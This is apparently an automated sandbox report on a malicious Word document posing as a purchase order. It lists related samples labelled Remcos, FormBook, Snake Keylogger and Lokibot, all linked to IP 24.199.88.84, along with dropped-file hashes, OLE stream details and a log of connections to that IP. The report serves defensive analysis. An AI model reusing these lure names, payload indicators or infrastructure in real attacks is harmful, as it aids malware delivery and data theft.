05af1f5ca1b87cc9cc9b25185115607d | EX0096959.docx.doc | malicious | Remcos | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | SGS-Report0201024.xla.xlsx | malicious | FormBook | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | BA4M310209H14956.xls | malicious | Remcos | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | PaymentXConfirmationXcopy.xls | malicious | Snake Keylogger | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Logs.xls | malicious | Lokibot | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | EX0096959.docx.doc | malicious | Remcos | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Inv No.248730.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Oct2024TU-580.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Inv No.248730.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Purchase Order IOI 7300194 Data Sheet.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | SGS-Report0201024.xla.xlsx | malicious | FormBook | 24.199.88.84
                No context
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025479304637521457
                Encrypted:false
                SSDEEP:6:I3DPcFzDI9vxggLRHtEhrRXv//4tfnRujlw//+GtluJ/eRuj:I3DPuzipEhtvYg3J/
                MD5:2657E084B6899E3EF5A03FED2E6DF945
                SHA1:1829D53BA4FCB59EC05F5783DF5348341B780083
                SHA-256:839358868337A62D9625471886C583EE00CAF15F2DD53F462511C5033820341D
                SHA-512:0595A28694960DF6B1BEA49A6484306373C11A7A04B495D050E2E743A0FF91BE34C91232EDCD1FEA4C383E485087FAB438C53461A888493E995AD733C01D7981
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z.......N..q"<...S,...X.F...Fa.q.............................. ls^0G..d..z...........c0..K......H......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1505804
                Entropy (8bit):0.6894867293295597
                Encrypted:false
                SSDEEP:768:AF6nq49ZMXFpwasuSkvsclCseeBysBjKsvcgBVYohKcKGXocoaNYDCrdhPREQjV:AFOq49Z+wasqvsclCseeosEsvxk5cTPN
                MD5:F243041BE67BE5A73D89A294CE9FD0CB
                SHA1:4E273C0C5A9343F825EBE0C5C74DC224D156CC35
                SHA-256:8E8EAACF577CCBDB358B7F90BDD533BE90494B6F29ADAF50C86559CFD9F9F93A
                SHA-512:D4DF8AF2C759C219E217938852B2FB34C6C8BCC1EFFBEC82626002AF3F0AA6BA3D8C6EE08DD01422C57BBCC426A8C7243D50F79BDF600A566D7D9817638A45F6
                Malicious:false
                Reputation:low
                Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1505804
                Entropy (8bit):1.580637216937634
                Encrypted:false
                SSDEEP:6144:PuzAK2NbrSAraChic1IOzeMctuBFbU7kUFrwJcum:HHprHhitOaMcu0ZrOa
                MD5:16D17119385717EB030C09137CFC2F1D
                SHA1:F18DF1B6783088BA15A1773A85C6E01D4CD75484
                SHA-256:847936068167A69D977F1876C628CF24E2098A22791438691A9DD989F9A685F1
                SHA-512:69985654C934F24C06A4081267F23AF974D542B38488CF46EE7680295BD44C4BB8ED969E12415F8001F727005BD9B4DA018E871A76D9EA73465E63F85B3FA1AE
                Malicious:false
                Reputation:low
                Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):106364
                Entropy (8bit):2.5203136559514965
                Encrypted:false
                SSDEEP:768:uWBy+Lsm72ub26fqoeNK+J99xoJOVlEX1iS6M+:Lu6FwlNl
                MD5:764EDEB272A488585426FCAD198077BD
                SHA1:ED41AA518AFDAAF487887889E799CA6FD0ECECF6
                SHA-256:9E7F18A268E22FF3D2AFC93E0C66F5FD47A570DDF1D1739165C6FCE9745FE7DC
                SHA-512:2AF4F299DD671B98A95693D1AF20129B79CE3C9DFFC8AF8043BE5387F60717C901A94B3694AA2149AFC9C8C6E095C615085FCF9D7288550C39BECB408195E4C7
                Malicious:false
                Reputation:low
                Preview:....l...............[...............2... EMF....|...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\...'......................%..........................................................L...d...................................!..............?...........?................................'.......................%...........(.......................L...d...........\...............m...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):331776
                Entropy (8bit):7.832927089965957
                Encrypted:false
                SSDEEP:6144:yjQ86kryPGBHJStwU77zs9lm31NQNL02HXHVNpXq3JXrOCcetHkwGM3GW:yjQ7kyPGt4Ps921NQN4kl/Xq5bOC7xht
                MD5:04F2BDDB72BD5360336BAB4C11FE593A
                SHA1:A7FAFEA883A989BC4851D95BECA9B75AD6D96DA6
                SHA-256:9993ED429710C5515C88ACE6F853D113D1E66E5BAEE7CACDE5CBD79F1B065E9A
                SHA-512:6FFF5E72D165CB1FB1DBFB3D98975E231737C90F83A0A49A5EFDD4F75124EC5A71195108C647407812A043E2BEF06B5D826A0AF1F7C35DDB9119FDB8D1966BC0
                Malicious:false
                Reputation:low
                Preview:......................>.......................................................................V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1536
                Entropy (8bit):3.294505361521836
                Encrypted:false
                SSDEEP:24:9na3uuF3oKMMb8jNDLO+n+c6CFkcbiSI/jx9n:9D/48jVOi+c6Cji9
                MD5:BDB4092A6D55AA55FF69EE6B013EA8AB
                SHA1:8E636F38B9D0601AF0CC2EA023D8E11FFAE40CE6
                SHA-256:7EB68E3C0DABC59C5B3DB17925AF666ED7036998F845BA30D5E6ABC93F3B6827
                SHA-512:8EF831DC6A224BEF5103197880A251437B41CDF9671C75EBFBCAA305B672A152742D3A35610D9FE84FFFB6ED100EA77E4C5DC89BDCC7ACC15A98220C55DC35BB
                Malicious:false
                Reputation:low
                Preview:.................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.........................E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . ...5.e.+.5.N.5.[...E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...=.5.X.=.0.5.[.5.[.5.X.5.e.5.X.5.N.5.[.."5.X..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................d........gd+.......
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.02565127395944895
                Encrypted:false
                SSDEEP:6:I3DPc48AavxggLRkyeZllVq9ERXv//4tfnRujlw//+GtluJ/eRuj:I3DPOAcIj49ovYg3J/
                MD5:3D40F0AB5B7AC9BE40F8A6710AF84233
                SHA1:70AA66915BBCC2AD684600D05B6298AF8B3216E4
                SHA-256:E406C995B218537851584D12ADD7D6159BC51920C742A61E8632CD68C40D4150
                SHA-512:56496DC6367E0D93F286E0FEB788FBF902997A6F5F9EC4AF6458074426CC3B58F84F9AACECF052C5CD755434842AD9F5E03A7FC6781F365F4464A210622C06A7
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z.Vy.E..B.a..+..@S,...X.F...Fa.q.............................j".9$dJ...............o....O.....(......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025479304637521457
                Encrypted:false
                SSDEEP:6:I3DPcFzDI9vxggLRHtEhrRXv//4tfnRujlw//+GtluJ/eRuj:I3DPuzipEhtvYg3J/
                MD5:2657E084B6899E3EF5A03FED2E6DF945
                SHA1:1829D53BA4FCB59EC05F5783DF5348341B780083
                SHA-256:839358868337A62D9625471886C583EE00CAF15F2DD53F462511C5033820341D
                SHA-512:0595A28694960DF6B1BEA49A6484306373C11A7A04B495D050E2E743A0FF91BE34C91232EDCD1FEA4C383E485087FAB438C53461A888493E995AD733C01D7981
                Malicious:false
                Preview:......M.eFy...z.......N..q"<...S,...X.F...Fa.q.............................. ls^0G..d..z...........c0..K......H......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Wed Oct 23 14:50:02 2024, length=464442, window=hide
                Category:dropped
                Size (bytes):1069
                Entropy (8bit):4.529852771071497
                Encrypted:false
                SSDEEP:24:8W2+b/XT9C14XpL34iyheVwo4iyDv3qJ57u:8a/XTo14Nih8wqJ9u
                MD5:3FA99EBCBDDC980A3F3C238044E47447
                SHA1:FACFC99B8E4C6303EF76F8DF0FDD098FE2815198
                SHA-256:E8C2645F708E24F04EE7BF7B58AF236FCACE20B593C7868577E3FB7FD8B2A319
                SHA-512:9A184F2ED4FAF4750FEF9FE60122576173A3CF98547084E78DDDCA0890F3B92B3E78612174302E9A911AEF4A8F750BA6D08299DBD06F2F56FD31F20C855C3A0D
                Malicious:false
                Preview:L..................F.... ......r......r...)..8c%..:............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....WY=~..user.8......QK.XWY=~*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.:...WYB~ .PONAHK~1.DOC..`.......WE..WE.*.........................P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0.0...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\621365\Users.user\Desktop\PO NAHK22012FA000000.docx.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0.0...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......621365.........
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Generic INItialization configuration [folders]
                Category:dropped
                Size (bytes):75
                Entropy (8bit):4.315355023771523
                Encrypted:false
                SSDEEP:3:H+Uk0/2m4YRk0/2v:Hzk0/ZRk0/I
                MD5:CFE23771994C01B94446FB7E34D51995
                SHA1:19DF2201F82C28E6310D95B122283AB629FA4E27
                SHA-256:8D75957A8114D08815E6B8EDB83F4F99E49B26F2130A0C91FB0CD3CA3B493614
                SHA-512:F56F918A1E5410787EBCEB7C0010754E07E873C412928CD46D0B1E7583A11522EAC6511ACA694D993EDB4970820A841B4F3EBC9FB1EEE9DD50E8E5D41018C2FF
                Malicious:false
                Preview:[misc]..PO NAHK22012FA000000.LNK=0..[folders]..PO NAHK22012FA000000.LNK=0..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.4797606462020307
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Microsoft Word 2007+
                Category:dropped
                Size (bytes):511159
                Entropy (8bit):7.984551477565033
                Encrypted:false
                SSDEEP:12288:OIPqAC/+QF7bWa2XZqIfZvpEjPj/m7eQMPmLJ:ByGEbvOdVpEP/mKQMPmF
                MD5:5F812E0FB0A04215804082890159CA22
                SHA1:BB90FCF3EDB65162D4F92F55533585BD83AB813A
                SHA-256:4B8C91F700C6EE9F57B33D54B26992EC5D656EAF7CD45F1BF7D350E500B1BA6C
                SHA-512:486CCCD67F4926B9A7E33AEF12FD91822EF384314103342775F9B3A5CFE9544D3960020CDCE66BF92F8A4DEA1ED31CEA9315D4CD1AD8932FC361F403DBCFCB0D
                Malicious:false
                Preview:PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VMo.0.....0t.l..0.C.....X..........&.~...].D..........E..V.#x.....Leki.%.....f..aj....m.......r..3.6X.6...s.Z......Jc...>..;Q.5........`B.".[.B#.T.n6..W...e...HU2...$.?.z.$.M#+.m......nW..........K..m.r8.........c+.~ k.0..Y..S.9......Qc...*.w.xK'....;..w........>.V.&.h...........4;.....U...U..#.....4...1J4.1.x..f...1$.w.~s.c:>#'%<...d*^.'.4..c......"...i.!'%.../...=.H..7..$..8...m..G..e....O.?2..F..X)8...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0
                File type:Microsoft Word 2007+
                Entropy (8bit):7.992586467445748
                TrID:
                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                • ZIP compressed archive (8000/1) 9.41%
                File name:PO NAHK22012FA000000.docx
                File size:464'442 bytes
                MD5:48dd0e8d2647a5d093f64f186dcac877
                SHA1:258650076b605d2d46984016ad2986e7e41b6b9e
                SHA256:e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16
                SHA512:d8ec5aebfd4ed529e4c5d59a5f025ef45942bedf5315b0166ba2b4a4650ac75640689b506ce6e130e10476f7292d839d17f0dc79cd72a8175eb91e0c34afec4d
                SSDEEP:12288:bx2ZjDyAincQBGCksr6Jl9Fnme6X4IKHlKLycN9GGdC:bx2VSNG39oNILHYG8C
                TLSH:04A423B164823588E3DD41B5E0134E3FF424BC449AF15B6BF670F13CADDAA856E94B42
                File Content Preview:PK.........XWY...k....'.......[Content_Types].xmlUT......g...g...g.V.n.0....?......(..r.].M...@.#.-E..Ib.}..c.A"9u._$..............._.y5..x....Z...V~....F....[@q.|.nq.....=..%...D.B....<G..:E...2*.[.A^.f.....SI.C,.7l Y...J.]u.#.C2...| ...D...e.Z.......|..
                Icon Hash:65e6a3a3afb7bdbf
                Document Type:OpenXML
                Number of OLE Files:2
                Has Summary Info:
                Application Name:
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:False
                Title:
                Subject:
                Author:91974
                Keywords:
                Template:Normal.dotm
                Last Saved By:91974
                Revision Number:2
                Total Edit Time:1
                Create Time:2024-10-22T10:35:00Z
                Last Saved Time:2024-10-22T10:36:00Z
                Number of Pages:1
                Number of Words:0
                Number of Characters:0
                Creating Application:Microsoft Office Word
                Security:0
                Number of Lines:1
                Number of Paragraphs:1
                Thumbnail Scaling Desired:false
                Company:Grizli777
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:12.0000
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:94
                Entropy:4.345966460061678
                Base64 Encoded:False
                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x1Ole
                CLSID:
                File Type:data
                Stream Size:20
                Entropy:0.8475846798245739
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x3ObjInfo
                CLSID:
                File Type:data
                Stream Size:6
                Entropy:1.2516291673878228
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 00 03 00 0d 00
                General
                Stream Path:CONTENTS
                CLSID:
                File Type:PDF document, version 1.7, 1 pages
                Stream Size:208625
                Entropy:7.986402136830817
                Base64 Encoded:True
                Data ASCII:% P D F - 1 . 7 . % . . . 3 0 o b j . < < / A u t h o r ( ) / C o m m e n t s ( ) / C o m p a n y ( ) / C r e a t i o n D a t e ( D : 2 0 2 4 0 8 1 3 0 9 4 0 4 3 + 0 8 ' 0 0 ' ) / C r e a t o r ( . W . P . S . h h < ) / K e y w o r d s ( ) / M o d D a t e ( D : 2 0 2 4 0 8 1 3 0 9 4 0 4 3 + 0 8 ' 0 0 ' ) / P r o d u c e r ( ) / S o u r c e M o d i f i e d ( D : 2 0 2 4 0 8 1 3 0 9 4 0 4 3 + 0 8 ' 0 0 ' ) / S u b j e c t ( ) / T i t l e ( ) / T r a p p e d
                Data Raw:25 50 44 46 2d 31 2e 37 0a 25 c2 b3 c7 d8 0d 0a 33 20 30 20 6f 62 6a 0d 3c 3c 2f 41 75 74 68 6f 72 20 28 29 20 2f 43 6f 6d 6d 65 6e 74 73 20 28 29 20 2f 43 6f 6d 70 61 6e 79 20 28 29 20 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 30 38 31 33 30 39 34 30 34 33 2b 30 38 27 30 30 27 29 20 2f 43 72 65 61 74 6f 72 20 28 fe ff 00 57 00 50 00 53 00 20 88 68 68 3c 29 20
                Has Summary Info:
                Application Name:
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:False
                Title:
                Subject:
                Author:91974
                Keywords:
                Template:Normal.dotm
                Last Saved By:91974
                Revision Number:2
                Total Edit Time:1
                Create Time:2024-10-22T10:35:00Z
                Last Saved Time:2024-10-22T10:36:00Z
                Number of Pages:1
                Number of Words:0
                Number of Characters:0
                Creating Application:Microsoft Office Word
                Security:0
                Number of Lines:1
                Number of Paragraphs:1
                Thumbnail Scaling Desired:false
                Company:Grizli777
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:12.0000
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:94
                Entropy:4.345966460061678
                Base64 Encoded:False
                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x1Ole
                CLSID:
                File Type:data
                Stream Size:20
                Entropy:0.8475846798245739
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x3ObjInfo
                CLSID:
                File Type:data
                Stream Size:6
                Entropy:1.2516291673878228
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 00 03 00 0d 00
                General
                Stream Path:CONTENTS
                CLSID:
                File Type:PDF document, version 1.4, 3 pages
                Stream Size:91631
                Entropy:6.456960855252374
                Base64 Encoded:True
                Data ASCII:% P D F - 1 . 4 . % . 2 0 o b j . < < / L e n g t h 4 9 / F i l t e r / F l a t e D e c o d e > > s t r e a m . x + r . 2 6 S 0 0 S . I r . . * T 0 T 0 . B . . f . . . . . e n d s t r e a m . e n d o b j . 4 0 o b j . < < / R e s o u r c e s < < / X O b j e c t < < / X f 1 1 0 R > > / P r o c S e t [ / P D F / T e x t / I m a g e B / I m a g e C / I m a g e I ] > > / M e d i a B o x [ 0 0 5 9 5 8 4 2 ] / P a r e n t 3 0 R / C o n t e n t s 2 0 R / T y p e / P a g
                Data Raw:25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 32 20 30 20 6f 62 6a 0a 3c 3c 2f 4c 65 6e 67 74 68 20 34 39 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 3e 3e 73 74 72 65 61 6d 0a 78 9c 2b e4 72 0a e1 32 36 53 b0 30 30 53 08 49 e1 72 0d e1 0a e4 2a 54 30 54 30 00 42 08 99 9c ab a0 1f 91 66 a8 e0 92 af 10 c8 05 00 ea a2 09 f2 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 23, 2024 17:50:05.450990915 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:05.451014042 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:05.451071978 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:05.459448099 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:05.459467888 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.152844906 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.152924061 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.159528971 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.159554005 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.159935951 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.159998894 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.273509979 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.315330982 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.440653086 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.440727949 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.440783978 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.440907955 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.446108103 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.446108103 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.446131945 CEST | 443 | 49164 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.446192026 CEST | 49164 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.878087044 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.878134966 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:06.878207922 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.878668070 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:06.878685951 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.564165115 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.564265966 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:07.569436073 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:07.569443941 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.569782019 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.576961994 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:07.619328976 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.755310059 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.755474091 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:07.755506992 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.755521059 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:07.755637884 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.755681038 CEST | 443 | 49165 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:07.755726099 CEST | 49165 | 443 | 192.168.2.22 | 24.199.88.84
